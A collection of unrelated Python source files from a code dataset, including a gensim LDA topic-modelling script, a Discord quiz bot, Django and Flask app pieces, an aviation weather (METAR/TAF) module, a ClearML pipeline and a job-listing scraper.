dropout=config.MODEL.DROPOUT,
droppath=config.MODEL.DROP_PATH)
return model
| StarcoderdataPython |
5155224 | # -*- coding: utf-8 -*-
# This tool reads an MM corpus and creates a cowtop
# feature matrix using LDA.
import argparse
import os.path
import sys
import copy
from gensim import models, corpora
import logging
def main():
logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)
parser = argparse.ArgumentParser()
parser.add_argument('corpus', help='serialized corpus (MM format)')
parser.add_argument('dictionary', help='serialized Gensim dictionary matching corpus')
parser.add_argument('outprefix', help='prefix for output files (model and TSV)')
parser.add_argument('num_topics', type=int, help='number of topics to infer')
parser.add_argument('--low', type=int, help='lower bound on term-document frequency (absolute)')
parser.add_argument('--high', type=float, help='upper bound on term-document frequency (proportion)')
parser.add_argument('--alpha', help='alpha parameter; only "asymmetric" or "auto"')
parser.add_argument('--etaauto', action='store_true', help="estimate asymmetric priors")
parser.add_argument('--iterations', type=int, default=50, help='cf. Gensim documentation')
parser.add_argument('--passes', type=int, default=1, help='cf. Gensim documentation')
parser.add_argument('--eval_every', type=int, default=10, help='cf. Gensim documentation')
parser.add_argument('--gamma_threshold', type=float, default=0.001, help='cf. Gensim documentation')
parser.add_argument('--minimum_probability',type=float, default=0.01, help='cf. Gensim documentation')
parser.add_argument('--minimum_phi_value', type=float, default=0.01, help='cf. Gensim documentation')
parser.add_argument('--chunksize', type=int, help='chunk size')
parser.add_argument('--resume', help='specifiy a previously created LDA model')
parser.add_argument('--erase', action='store_true', help="erase outout files if present")
parser.add_argument('--distributed', action='store_true', help="run on cluster (alread set up!)")
args = parser.parse_args()
# Sanity-check parameters.
if args.alpha and not (args.alpha == 'asymmetric' or args.alpha == 'auto'):
sys.exit('Illegal value for alpa.')
eta="auto" if args.etaauto else None
chunksize=1000 if not args.chunksize else args.chunksize
# Sanity-check num_topics.
if args.num_topics < 2:
sys.exit('Number of topics must be greater or equal to 2.')
# Build output file names.
fn_matrix_txt = args.outprefix + "_matrix_lda.tsv"
fn_topics = args.outprefix + "_topics_lda.tsv"
fn_model = args.outprefix + ".lda"
# Check input files.
infiles = [args.corpus, args.dictionary]
if args.resume:
infiles.append(args.resume)
for fn in infiles:
if not os.path.exists(fn):
sys.exit("Input file does not exist: " + fn)
# Check (potentially erase) output files.
outfiles = [fn_matrix_txt, fn_topics]
if not args.resume:
outfiles.append(fn_model)
# In case dictionary filters are used, check new files.
if args.low or args.high:
fn_newdict=args.outprefix + "_filtered.dict"
outfiles.append(fn_newdict)
fn_newdict_txt=args.outprefix + "_filtered.dict.txt"
outfiles.append(fn_newdict_txt)
fn_newcorp=args.outprefix + "_filtered.mm"
outfiles.append(fn_newcorp)
for fn in outfiles:
if fn is not None and os.path.exists(fn):
if args.erase:
try:
os.remove(fn)
except:
sys.exit("Cannot delete pre-existing output file: " + fn)
else:
sys.exit("Output file already exists: " + fn)
# Load corpus and dictionary.
dictionary = corpora.dictionary.Dictionary.load(args.dictionary)
corpus = corpora.MmCorpus(args.corpus)
# If desired, filter dict and adapt corpus.
if args.low or args.high:
new_dict = copy.deepcopy(dictionary)
# Filter dictionary.
# TODO There must be a more elegant solution for the conditional.
if args.low and not args.high:
new_dict.filter_extremes(no_below=args.low)
elif args.high and not args.low:
new_dict.filter_extremes(no_above=args.high)
else:
new_dict.filter_extremes(no_below=args.low, no_above=args.high)
new_dict.save(fn_newdict)
new_dict.save_as_text(fn_newdict_txt)
# Transform corpus.
old2new = {dictionary.token2id[token]:new_id for new_id, token in new_dict.iteritems()}
vt = models.VocabTransform(old2new)
corpus=vt[corpus]
corpora.MmCorpus.serialize(fn_newcorp, corpus, id2word=new_dict)
# Reassing new dict to old variable.
dictionary=new_dict
if args.resume:
# Just load an old model.
lda = models.LdaModel.load(args.resume, mmap='r')
else:
# Run LDA. TODO: Pass parameters.
lda = models.LdaModel(corpus, alpha=args.alpha, eta=eta, id2word=dictionary, num_topics=args.num_topics, distributed=args.distributed, chunksize=chunksize, iterations=args.iterations, passes=args.passes, eval_every=args.eval_every, gamma_threshold=args.gamma_threshold, minimum_probability=args.minimum_probability, minimum_phi_value=args.minimum_phi_value)
lda.save(fn_model)
# Dump topics.
outf = open(fn_topics, 'w')
for i in range(0, args.num_topics):
t = lda.show_topic(i, 25)
outf.write('topic' + str(i) + '\t' + '\t'.join([' '.join([x[0], str(x[1])]) for x in t]).encode('utf-8') + '\n')
# Dump document-topic associations. Human-readable.
mtf = open(fn_matrix_txt, 'w')
i = 0
corpus_lda = lda[corpus]
for doc in corpus_lda:
mtf.write('document' + str(i) + '\t' + '\t'.join([' '.join([str(x[0]), str(x[1])]) for x in doc]) + '\n')
# mtf.write('document' + str(i) + '\t' + '\t'.join([' '.join([str(x[0]), str(x[1])]) for x in lda.get_document_topics(doc)]) + '\n')
i += 1
if __name__ == "__main__":
main()
| StarcoderdataPython |
4909366 | <filename>jiant/jiant/tasks/lib/cosmosqa.py
import pandas as pd
from dataclasses import dataclass
from jiant.tasks.lib.templates.shared import labels_to_bimap
from jiant.tasks.lib.templates import multiple_choice as mc_template
@dataclass
class Example(mc_template.Example):
@property
def task(self):
return CosmosQATask
@dataclass
class TokenizedExample(mc_template.TokenizedExample):
pass
@dataclass
class DataRow(mc_template.DataRow):
pass
@dataclass
class Batch(mc_template.Batch):
pass
class CosmosQATask(mc_template.AbstractMultipleChoiceTask):
Example = Example
TokenizedExample = Example
DataRow = DataRow
Batch = Batch
CHOICE_KEYS = [0, 1, 2, 3]
CHOICE_TO_ID, ID_TO_CHOICE = labels_to_bimap(CHOICE_KEYS)
NUM_CHOICES = len(CHOICE_KEYS)
def get_train_examples(self):
return self._create_examples(path=self.train_path, set_type="train")
def get_val_examples(self):
return self._create_examples(path=self.val_path, set_type="val")
def get_test_examples(self):
return self._create_examples(path=self.test_path, set_type="test")
@classmethod
def _create_examples(cls, path, set_type):
df = pd.read_csv(path)
examples = []
for i, row in enumerate(df.itertuples()):
examples.append(
Example(
guid="%s-%s" % (set_type, i),
prompt=row.context + " " + row.question,
choice_list=[row.answer0, row.answer1, row.answer2, row.answer3],
label=row.label if set_type != "test" else cls.CHOICE_KEYS[-1],
)
)
return examples
| StarcoderdataPython |
9629467 | <filename>quiz.py<gh_stars>0
import asyncio
import random
import re
import unidecode
import os
import numpy as np
import operator
import discord
class Question:
def __init__(self, question, propositions, proposition_emojis, correct_idx, score):
self.question = question
self.propositions = propositions
self.proposition_emojis = proposition_emojis
assert len(self.propositions) == len(self.proposition_emojis)
self.correct_idx = correct_idx
self.score = score
@property
def ask(self):
question_text = "["+str(self.score)+" points]\n"
question_text += self.question + '\n'
for i in range(len(self.propositions)):
question_text += self.proposition_emojis[i] + ' ' + self.propositions[i] + '\n'
return question_text
class Carré(Question):
def __init__(self, question, propositions, correct_idx, score):
super().__init__(question, propositions, ['1️⃣', '2️⃣','3️⃣','4️⃣'], correct_idx, score)
class VraiFaux(Question):
def __init__(self, question, answer, score):
super().__init__(question, ['Vrai', 'Faux'], ['👍', '👎'], int(not answer), score)
class Cash(Question):
def __init__(self, question, answer, score):
super().__init__(question, [], [], None, score)
self.answer = answer
class Quiz:
def __init__(self, bot):
self.questions = []
self.current_question_idx = 0
self.scores = {}
self.messages = set()
self.bot = bot
self.players_answers = {}
@property
def current_question(self):
return self.questions[self.current_question_idx]
def load_questions(self, question_file):
with open(question_file, encoding='utf-8',errors='replace') as qfile:
lines = qfile.readlines()
def reset_variables():
return None, None, [], 10
question, answer, propositions, score = reset_variables()
for line in lines:
if not line.strip().startswith('#'):
if line.strip() == '': # ligne vide, alors on ajoute la question s'elle est complète, sinon on l'abandonne
if question is not None:
if type(answer)==int:
# Carré
q = Carré(question, propositions, answer, score)
elif type(answer)==bool:
# VraiFaux
q = VraiFaux(question, answer, score)
else:
# Cash
q = Cash(question, answer, score)
self.questions.append(q)
question, answer, propositions, score = reset_variables()
if line.strip().lower().startswith('question'):
question = line.strip()[line.find(':') + 1:].strip()
elif line.strip().lower().startswith('answer'):
answer = line.strip()[line.find(':') + 1:].strip()
if answer in ['0','1']:
answer = bool(int(answer))
elif line.strip().lower().startswith('score'):
score = int(line.strip()[line.find(':') + 1:].strip())
elif line.strip().lower().startswith('-'): # proposition
if line.strip().lower().startswith('->'): # correct
propositions.append(line.strip()[line.find(':') + 1:].strip()[2:])
answer = len(propositions)-1
else:
propositions.append(line.strip()[line.find(':') + 1:].strip()[1:])
def start_round(self, round_name):
for team in self.scores.keys():
self.scores[team] = 0
self.load_questions('./qualifs/'+round_name)
self.current_question_idx = -1
self.question_pending = False
async def clear_messages(self):
for message in self.messages:
cache_msg = discord.utils.get(self.bot.cached_messages, id=message.id)
await cache_msg.delete()
self.messages = set()
async def skip_question(self, ctx):
self.question_pending = False
self.ask_next(ctx)
async def ask_next(self, ctx):
if not self.question_pending and self.current_question_idx < len(self.questions)-1:
self.question_pending = True
await self.clear_messages()
self.current_question_idx += 1
self.players_answers = {}
current_question = self.questions[self.current_question_idx]
message = '**Question '+str(self.current_question_idx+1)+'/'+str(len(self.questions))+'** '+current_question.ask
current_question.message = await ctx.send(message)
self.messages.add(current_question.message)
for reaction in current_question.proposition_emojis:
await current_question.message.add_reaction(reaction)
async def conclude_question(self, ctx):
self.scores_deltas = {team_role: 0 for team_role in self.scores.keys()}
current_question = self.current_question
for player in self.players_answers.keys():
for team_role in self.scores_deltas.keys():
if team_role in player.roles:
print(self.players_answers[player], current_question.proposition_emojis[current_question.correct_idx])
if self.players_answers[player] == current_question.proposition_emojis[current_question.correct_idx]:
self.scores_deltas[team_role] += current_question.score
self.scores[team_role] += current_question.score
if not isinstance(current_question, Cash):
message = "La réponse était **"+current_question.proposition_emojis[current_question.correct_idx] + current_question.propositions[current_question.correct_idx] + '**'
else:
message = "La réponse était **"+ current_question.answer + '**'
self.messages.add(await ctx.send(message))
await self.show_scores(ctx, show_deltas=True)
self.question_pending = False
async def show_scores(self, ctx, show_deltas=False):
message = "**Scores**\n"
sorted_scores = sorted(self.scores.items(), key=operator.itemgetter(1), reverse=True)
for team_score in sorted_scores:
message += team_score[0].mention + ' : ' + str(team_score[1])
if show_deltas:
message += ' **(+' + str(self.scores_deltas[team_score[0]]) + ')**'
message += '\n'
self.messages.add(await ctx.send(message))
| StarcoderdataPython |
371751 | <reponame>idosavion/coursist<filename>academic_helper/urls.py
from django.http import JsonResponse
from django.urls import path, include
from academic_helper.views.basic import IndexView
from academic_helper.views.courses import CoursesView, CourseDetailsView
from academic_helper.views.other import AjaxView, AboutView
from academic_helper.views.schedule import ScheduleView
from academic_helper.views.user_view import UserView
def healthy(request):
return JsonResponse({"status": 200})
urlpatterns = [
path("", IndexView.as_view(), name="index"),
path("ajax/", AjaxView.as_view(), name="ajax"),
path("courses/", CoursesView.as_view(), name="courses"),
path("courses/<int:course_number>/", CourseDetailsView.as_view(), name="course-details"),
path("accounts/", include("allauth.urls"), name="accounts"),
path("about/", AboutView.as_view(), name="about"),
path("schedule/", ScheduleView.as_view(), name="schedule"),
path("user/<str:username>/", UserView.as_view(), name="user")
]
| StarcoderdataPython |
1618960 | <filename>elib_wx/avwx/__init__.py
# coding=utf-8
# type: ignore
"""
<NAME> - <EMAIL>
Original source: https://github.com/flyinactor91/AVWX-Engine
Modified by <EMAIL>
"""
# type: ignore
# type: ignore
# stdlib
from datetime import datetime
from os import path
# module
from . import metar, service, speech, structs, summary, taf, translate
from .core import valid_station
from .exceptions import BadStationError
from .static import INFO_KEYS
INFO_PATH = path.dirname(path.realpath(__file__)) + '/stations.json'
# STATIONS = json.load(open(INFO_PATH))
# type: ignore
class Report:
"""
Base report to take care of service assignment and station info
"""
#: UTC Datetime object when the report was last updated
last_updated: datetime
#: The un-parsed report string. Fetched on update()
raw: str
#: ReportData dataclass of parsed data values and units. Parsed on update()
data: structs.ReportData
#: ReportTrans dataclass of translation strings from data. Parsed on update()
translations: structs.ReportTrans
#: Units inferred from the station location and report contents
units: structs.Units
_station_info: structs.StationInfo
def __init__(self, station: str) -> None:
# Raises a BadStation error if needed
valid_station(station)
#: Service object used to fetch the report string
# noinspection PyCallingNonCallable
self.service = service.get_service(station)(self.__class__.__name__.lower())
#: 4-character ICAO station ident code the report was initialized with
self.station = station
def update(self, report: str = None) -> bool:
"""
Updates report elements. Not implemented
"""
raise NotImplementedError()
class Metar(Report):
"""
Class to handle METAR report data
"""
metar_data: structs.MetarData
metar_translations: structs.MetarTrans
def update(self, report: str = None) -> bool:
"""Updates raw, data, and translations by fetching and parsing the METAR report
Returns True is a new report is available, else False
"""
if report is not None:
self.raw = report
else:
raw = self.service.fetch(self.station)
if raw == self.raw:
return False
self.raw = raw
self.metar_data, self.units = metar.parse(self.station, self.raw)
self.metar_translations = translate.metar(self.metar_data, self.units)
self.last_updated = datetime.utcnow()
return True
@property
def summary(self) -> str:
"""
Condensed report summary created from translations
"""
if not self.metar_translations:
self.update()
return summary.metar(self.metar_translations)
@property
def speech(self) -> str:
"""
Report summary designed to be read by a text-to-speech program
"""
if not self.metar_data:
self.update()
return speech.metar(self.metar_data, self.units)
class Taf(Report):
"""
Class to handle TAF report data
"""
taf_data: structs.TafData
taf_translations: structs.TafTrans
def update(self, report: str = None) -> bool:
"""
Updates raw, data, and translations by fetching and parsing the TAF report
Returns True is a new report is available, else False
"""
if report is not None:
self.raw = report
else:
raw = self.service.fetch(self.station)
if raw == self.raw:
return False
self.raw = raw
self.taf_data, self.units = taf.parse(self.station, self.raw)
self.taf_translations = translate.taf(self.taf_data, self.units)
self.last_updated = datetime.utcnow()
return True
@property
def summary(self):
"""
Condensed summary for each forecast created from translations
"""
if not self.taf_translations:
self.update()
return [summary.taf(trans) for trans in self.taf_translations.forecast]
@property
def speech(self) -> str:
"""
Report summary designed to be read by a text-to-speech program
"""
if not self.taf_data:
self.update()
return speech.taf(self.taf_data, self.units)
| StarcoderdataPython |
3541158 | from clearml import Task
from clearml.automation import PipelineController
def pre_execute_cb(a_pipeline, a_node, current_param_override):
# type (PipelineController, PipelineController.Node, dict) -> bool
print('Cloning Task id={} with parameters: {}'.format(a_node.base_task_id, current_param_override))
# if we want to skip this node (and subtree of this node) we return False
# return True to continue DAG execution
return True
def post_execute_cb(a_pipeline, a_node):
# type (PipelineController, PipelineController.Node) -> None
print('Completed Task id={}'.format(a_node.executed))
# if we need the actual executed Task: Task.get_task(task_id=a_node.executed)
return
pipe = PipelineController('T4C pipeline', 't4c', '0.0.2')
pipe.set_default_execution_queue('services')
# TODO if dataset is already uploaded, don't go through subset creation
pipe.add_step(name='stage_data', base_task_project='t4c', base_task_name='subset_creation',
task_overrides={"script.version_num":"3c1b660826c90a55a6c246c9f5ca18982ea2acff","script.branch": "master"})
pipe.add_step(name='train', base_task_project='t4c', base_task_name='train_model',)
#task_overrides={"script.version_num":"3c1b660826c90a55a6c246c9f5ca18982ea2acff","script.branch": "master"})
# YAML override: parameter_override={'Args/overrides': '[the_hydra_key={}]'.format(a_new_value)})
pipe.start_locally()
#pipe.start()
print('done')
| StarcoderdataPython |
11297400 | from setuptools import setup
with open('README.md', 'r') as fh:
long_description = fh.read()
setup(
name='ingreedypy',
py_modules=['ingreedypy'],
version='1.3.5',
description='ingreedy-py parses recipe ingredient lines into a object',
long_description=long_description,
long_description_content_type='text/markdown',
author='<NAME>',
author_email='<EMAIL>',
url='https://github.com/openculinary/ingreedy-py',
keywords=['ingreedy', 'ingreedypy', 'recipe', 'parser'],
install_requires=[
'parsimonious'
],
extras_require={
'tests': [
'pytest',
'pytest-cov',
]
},
classifiers=[
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
)
| StarcoderdataPython |
1782494 | from flask_wtf import FlaskForm
from wtforms import StringField,TextAreaField,SubmitField,RadioField
from wtforms.validators import Required
class PitchForm(FlaskForm):
title = StringField('Pitch title',validators=[Required()])
pitch = TextAreaField('Pitch', validators=[Required()])
category = RadioField('Category', choices=[('Interview','Interview'),('Slogan','Slogan'),('Advertisement','Advertisement'),('Pickup-lines','Pickup-lines')],validators=[Required()])
submit = SubmitField('Submit')
class UpdateProfile(FlaskForm):
bio = TextAreaField('Tell us about you.',validators = [Required()])
submit = SubmitField('Submit')
class CommentForm(FlaskForm):
comment = TextAreaField('Add a Comment',validators = [Required()])
submit = SubmitField('Submit')
class Upvote(FlaskForm):
submit = SubmitField('Like')
class Downvote(FlaskForm):
submit = SubmitField('Dislike') | StarcoderdataPython |
9743766 | import os, glob
class ImageListCreator(object):
def __init__(self):
pass
# This takes a directory name and looks for jpg images and creates a text file listing those images location.
def make_list_image_filenames(self, image_path):
dir_path = os.path.dirname(os.path.realpath(__file__))
#filename = os.path.join(dir_path , directory_name)
filename = image_path
if os.path.exists(filename):
os.chdir(filename)
text_file = open(os.path.join(dir_path , "images.txt"), "w")
types = ('*.jpeg', '*.jpg' , '*.JPEG' , '*.png') # the tuple of file types
files_grabbed = []
for files in types:
files_grabbed.extend(glob.glob(files))
for file in files_grabbed:
text_file.write(os.path.join(filename , file) + "\n")
text_file.close()
print("images.txt created at location : " + dir_path)
os.chdir(dir_path)
else:
print("No Folder exist of name \"" + image_path + "\" Please create and put images into it")
if __name__ == "__main__":
# How to use
fm = ImageListCreator()
#"Parameter: folder name where your images are located"
fm.make_list_image_filenames("images") | StarcoderdataPython |
9797087 | from wx_pay.unified import WxPayOrderClient # NOQA
from wx_pay.query import WxPayQueryClient # NOQA
| StarcoderdataPython |
5130356 | from chainer_chemistry.iterators.balanced_serial_iterator import BalancedSerialIterator # NOQA
from chainer_chemistry.iterators.index_iterator import IndexIterator # NOQA
| StarcoderdataPython |
49592 | <filename>src/main.py
from utility import util
CONN = util.connectAlpaca()
class algo:
pass
| StarcoderdataPython |
5030179 | <reponame>utyman/tdc-wiretapping<filename>tdc-wiretapping/inf_utils.py
import math
from clint.textui import colored, puts
from os import system, remove
from graphviz import Digraph
import ntpath
def dump_results(filein, symbol_dict, entropy, max_entropy, totalEvents):
file = open('data.dat', 'w+')
i = 0;
max = 0.0
for key in sorted(symbol_dict, key=symbol_dict.__getitem__, reverse=True):
file.write(str(i) + "\t" + str(key) + "\t \t" + str(information(symbol_dict.get(key), totalEvents)) + "\n")
if information(symbol_dict.get(key), totalEvents) > max:
max = information(symbol_dict.get(key), totalEvents)
i+=1
max = max*1.25
file.close();
system('gnuplot -e "max=' + str(max) +'" -e "filename=\'info' + str(ntpath.basename(filein) + '.png') + '\'" -e "maxentropy=' + str(max_entropy) + '" -e "entropy=' + str(entropy) + '" plot.gp')
remove("data.dat")
def dump_graph(filein, symbol_nodos):
dot = Digraph(comment='Nodos en la red', format='png')
for nod in symbol_nodos.keys():
dot.node(nod, nod);
for nod in symbol_nodos.keys():
destinos = symbol_nodos.get(nod);
for dest in destinos:
dot.edge(nod, dest);
filename = str(ntpath.basename(filein));
dot.render(filename=filename);
return dot;
# returns information
def information(totalSymbol, totalEvents):
return (-1)*math.log(totalSymbol/totalEvents, 2);
# returns entropy
def entropy(symbol_dict, totalEvents):
acc = 0.0
for key in symbol_dict:
acc += getFrequency(symbol_dict[key], totalEvents) * getInformation(symbol_dict[key], totalEvents)
return str(acc)
# max entropy
def max_entropy(symbol_dict):
return str(math.log(len(symbol_dict.keys()), 2))
# returns information rendered by a symbol from a source
def getInformation(symbolEvents, totalEvents):
return -1.0 * math.log(getFrequency(symbolEvents, totalEvents), 2)
# returns frequency of a symbol from a source
def getFrequency(symbolEvents, totalEvents):
return float(symbolEvents)/totalEvents | StarcoderdataPython |
6623007 | <gh_stars>0
# p36.py
str1 = input().split()
str2 = input().split()
str3 = input().split()
str1 = list(map(int, str1))
str2 = list(map(int, str2))
str3 = list(map(int, str3))
n = str1[0]
k = str1[1]
for i in range(1, k + 1):
if i % 2 != 0:
for j in range(0, n):
if str2[2*j] >= str3[i-1]:
print(2*j+1)
break
else:
for j in range(0, n):
if str2[2*n-1-2*j] >= str3[i-1]:
print(2*n-2*j)
break
| StarcoderdataPython |
1979841 | <filename>nbassignment/utils/notebookfilefinder.py
import re
import os
class MarkdownImageFinder:
def __init__(self):
self.__p_inline = re.compile(r'!\[[^\]]*\]\(([^\)]*)\)')
self.__p_html = re.compile(r'<img[^>]*src\s*=\s*("[^"]*"|\'[^\']*\')')
self.__p_alt = re.compile(r'!\[[^\]]*\](\[[^\)\n]*\])')
def __find_inline_images(self, markdown):
return [find for find in self.__p_inline.findall(markdown)\
if not find.startswith('attachment:')]
def __find_html_images(self, markdown):
return [find[1:][:-1] for find in self.__p_html.findall(markdown)]
def __find_alt_images(self, markdown):
finds = []
for link in self.__p_alt.findall(markdown):
# Search for the alt link
for line in markdown.split('\n'):
if line.strip().startswith(link) and ':' in line:
finds.append(line.split(':')[-1].strip())
return finds
def find_images(self, markdown):
return self.__find_inline_images(markdown) + \
self.__find_html_images(markdown) + \
self.__find_alt_images(markdown)
class CodeFileFinder:
def __init__(self):
self.__directory = r'[\w-]+'
self.__slash = r'(/|\\)'
def __get_pattern(self, filename):
return re.compile(r'["\'](({}{})*{})["\']'.format(
self.__directory, self.__slash, filename
))
def find_file(self, string, filename):
return [f[0] for f in self.__get_pattern(filename).findall(string)]
class NotebookFileFinder:
def __init__(self):
self.__mdfinder = MarkdownImageFinder()
self.__codefinder = CodeFileFinder()
def flatten(self, iterable):
return [item for sublist in iterable for item in sublist]
def find_files_in_notebook(self, nb, files):
finds = set()
# Split into markdown and code cells
markdown = [cell.source for cell in nb.cells if cell.cell_type == 'markdown']
code = [cell.source for cell in nb.cells if cell.cell_type == 'code']
# Find images in markdown cells
markdown_finds = self.flatten(
[self.__mdfinder.find_images(cell) for cell in markdown]
)
# Find files in code cells
code_finds = []
for other_file in files:
name = os.path.basename(other_file)
code_finds.extend(self.flatten(
[self.__codefinder.find_file(cell, name) for cell in code]
))
for find in markdown_finds:
if name in find:
finds.add(find)
code_finds = set(code_finds)
return finds.union(code_finds)
| StarcoderdataPython |
5021354 | <reponame>waikato-datamining/wai-common
from typing import Optional, Tuple
# Datatypes
DATATYPE_STRING = 'S'
DATATYPE_NUMERIC = 'N'
DATATYPE_BOOLEAN = 'B'
DATATYPE_UNKNOWN = 'U'
# Separator between parts of a compound name
SEPARATOR = '\t'
class Field:
"""
Class representing a report field. Has a name and a datatype.
Can be a compound name, where the prefix and suffix parts of
the name are separated by a tab.
"""
def __init__(self, name, datatype=DATATYPE_UNKNOWN):
# Placeholders for computed properties
self.prefix: Optional[str] = None
self.suffix: Optional[str] = None
self.name: str = name
self.datatype: str = datatype
def value_of(self, value: str):
"""
Converts a string into a value of the correct type for
this field.
:param value: The string value to convert.
:return: The typed value.
"""
if self.datatype == DATATYPE_STRING:
return fix_string(value)
elif self.datatype == DATATYPE_BOOLEAN:
return bool(value)
elif self.datatype == DATATYPE_NUMERIC:
return float(value)
else:
raise ValueError('Cannot convert value as field type is unknown')
def __setattr__(self, key, value):
# Validation of datatype
if key == 'datatype' and not is_valid_datatype(value):
raise ValueError('datatype must be S, N, B or U')
super().__setattr__(key, value)
def __getattribute__(self, item):
# Lazy calculation of prefix/suffix
if item == 'prefix' or item == 'suffix':
self.prefix, self.suffix = split_name(self.name)
return super().__getattribute__(item)
def split_name(name: str) -> Tuple[Optional[str], Optional[str]]:
"""
Splits a compound name into its prefix and suffix parts.
:param name: TODO
:return: TODO
"""
# If there's no separator, it's not a compound name
if SEPARATOR not in name:
return None, None
# Split around the tab character
split = name.split(SEPARATOR, 1)
prefix = split[0]
suffix = split[1]
return prefix, suffix
def is_valid_datatype(datatype: str) -> bool:
"""
Checks if the given datatype string is one of the
allowable values.
:param datatype: The datatype string to check.
:return: True if the datatype string is valid,
False if not.
"""
return datatype in {DATATYPE_STRING,
DATATYPE_NUMERIC,
DATATYPE_BOOLEAN,
DATATYPE_UNKNOWN}
def fix_string(string: str) -> str:
"""
Replaces apostrophes with back-ticks.
:param string: The string to fix.
:return: The fixed string.
"""
return string.replace("'", "`")
| StarcoderdataPython |
3208586 | <filename>src/utils/parse/types.py
import typing
def try_int(s: str) -> typing.Optional[int]:
try:
return int(s)
except ValueError:
return None
| StarcoderdataPython |
8121948 | # Copyright 2021 TUNiB Inc.
class InfiniteDataLoader:
"""
Make dataloader to have infinite iterator
This is copy of ``deepspeed.runtime.dataloader.RepeatingLoader``
"""
def __init__(self, loader):
self.loader = loader
self.data_iter = iter(self.loader)
def __iter__(self):
return self
def __next__(self):
try:
batch = next(self.data_iter)
except StopIteration:
self.data_iter = iter(self.loader)
batch = next(self.data_iter)
return batch
| StarcoderdataPython |
1795344 | from django import forms
from django.forms import widgets
from order.models import BillingAddress, ShippingAddress
class ShippingAddressForm(forms.ModelForm):
class Meta:
model = ShippingAddress
fields = [
'user',
'first_name',
'last_name',
'address',
'city',
'zipcode',
'country',
'phone',
]
widgets = {
'user': widgets.Select(attrs={'class': 'form-control'}),
'first_name': widgets.TextInput(attrs={'class': 'input-text'}),
'last_name': widgets.TextInput(attrs={'class': 'input-text'}),
'address': widgets.TextInput(attrs={'class': 'input-text'}),
'city': widgets.TextInput(attrs={'class': 'input-text'}),
'zipcode': widgets.TextInput(attrs={'class': 'input-text'}),
'country': widgets.TextInput(attrs={'class': 'input-text'}),
'phone': widgets.TextInput(attrs={'class': 'input-text'}),
}
class BillingAddressForm(forms.ModelForm):
class Meta:
model = BillingAddress
fields = [
'user',
'first_name',
'last_name',
'address',
'city',
'zipcode',
'country',
'phone',]
widgets = {
'user' : widgets.Select(attrs={'class': 'form-control'}),
'first_name': widgets.TextInput(attrs={'class': 'input-text'}),
'last_name': widgets.TextInput(attrs={'class': 'input-text'}),
'address': widgets.TextInput(attrs={'class': 'input-text'}),
'city': widgets.TextInput(attrs={'class': 'input-text'}),
'zipcode': widgets.TextInput(attrs={'class': 'input-text'}),
'country': widgets.TextInput(attrs={'class': 'input-text'}),
'phone': widgets.TextInput(attrs={'class': 'input-text'}),
} | StarcoderdataPython |
8154071 | import json,re,csv;
#csv
#open('hrmonkeys.csv','w').write('Company Name,Location,Job type,Rating,Job details(time),Job details(price),Qualifications,Closing Date,Full job description,Duties and Responsibilities,Preferred Qualifications\n');
# remote
# base_url
base_url = 'https://www.simplyhired.com'
# list of urls to scrape
l =[]
# get all the link with pagination
[(fetch('https://www.simplyhired.com/search?q=cannabis+jobs&l=Remote&job=WbE9YtfIPQX4KIkH8RuRZtHkpfzVL47bS0K09zgBEeMtMWR59fIWyw&pn='+str(i)),
[l.append(base_url+str(r.css('a.card-link::attr(href)').get())) for r in response.css('div[class="SerpJob-jobCard card"]')]# get the links
) for i in range(1,2)] # 13
# clean qualification
def clean_1(elements,pin):
if elements :
regex = r'''(<\w+( )*>)([^<]+)'''
li =[l for l in re.findall(regex,elements)]
li.pop(0)
indexies = []
for i in li :
if i[0]=='<b>' :
indexies.append(li.index(i))
if pin==1 :
my_list = li[:indexies[0]]
text = ''
for x in my_list :
if x is not None :
text= text + str(x[2].strip('\n'))
return text
if pin ==2:
my_list = li[indexies[0]+1:indexies[1]]
text = ''
for x in my_list :
if x is not None :
text= text + str(x[2].strip('\n'))
return text
if pin ==3:
my_list = li[indexies[1]+1:indexies[2]]
text = ''
for x in my_list :
if x is not None :
text= text + str(x[2].strip('\n'))
return text
else :
return ""
# clean qualification
def clean_2(text):
p = ''
for x in text :
p = p + '-' + str(x)
return p
my_link = 'https://www.simplyhired.com/job/pOCdVeLCBoccX__-X0IkNGUDtnYlsOS8rrCPC4HCN331OF1n9qP3EQ?q=cannabis+jobs'
# crawling and getting the data
[(fetch(x),
[open('gig.json','a').write(json.dumps({
"Company Name" : r.css('h2[class="viewjob-jobTitle h2"]::text').get(),
"Location" : r.css('div[class="viewjob-labelWithIcon"]::text').get(),
"Job type" : r.css('div[class="viewjob-labelWithIcon"]::text').getall()[1],
"Rating" : r.css('span[class="CompanyRatings-ratingDigit"]::text').get(),
"Job details(time) " : r.css('span[class="viewjob-labelWithIcon viewjob-jobType"]> span::text').get(),
"Job details(price) " : r.css('span[class="viewjob-labelWithIcon viewjob-salary"]::text').getall()[1] ,
"Qualifications " : clean_2(r.css('li[class="viewjob-qualification"]::text').getall()),
"Closing Date" :r.css('div > div:nth-child(5) > div > div.p::text').get(),
"Full job description" : clean_1(r.css('div > div:nth-child(5) > div > div.p').get(),1),
"Duties and Responsibilities":clean_1(r.css('div > div:nth-child(5) > div > div.p').get(),2),
"Preferred Qualifications" : clean_1(r.css('div > div:nth-child(5) > div > div.p').get(),3),
},indent=2,ensure_ascii=False)+'\n')
for r in response.css('aside[class="rpContent ViewJob ViewJob-redesign ViewJob-v3"]') if r is not None]) for x in l ]
| StarcoderdataPython |
3341522 | import unittest
from handlers.QueryHandler import QueryHandler
from collections import namedtuple
cassandraRow = namedtuple('row', ['timestamp', 'name', 'value'])
ANNOTATION_NAME = 'test annotation'
class TestAnnotationsHandler(unittest.TestCase):
rows = [
cassandraRow(timestamp=9876543210, name='oxygen', value=0.001),
cassandraRow(timestamp=1256903478, name='laser', value=123),
cassandraRow(timestamp=1000000000, name='door', value=True),
cassandraRow(timestamp=2000000000, name='file name', value='text'),
cassandraRow(timestamp=6000000000, name='oxygen', value=0.002),
cassandraRow(timestamp=7000000000, name='laser', value=0),
cassandraRow(timestamp=9000000000, name='door', value=False),
]
def test_parse_results_as_timeserie(self):
results = QueryHandler._parse_results_as_timeserie(self.rows)
names = set(line.name for line in self.rows)
self.assertEqual(len(names), len(results), msg='Parsed results have one entry for every different name')
for line in results:
self.assertTrue(line['target'] in names, msg='All entries have a target from a raw result name')
self.assertTrue(len(line['datapoints']) > 0, msg='All entries have at least one point')
row_values = [row for row in self.rows if row.name == line['target']]
self.assertEqual(len(row_values), len(line['datapoints']), msg='An entry have as much point as row values')
for i in range(len(row_values)):
raw_point = row_values[i]
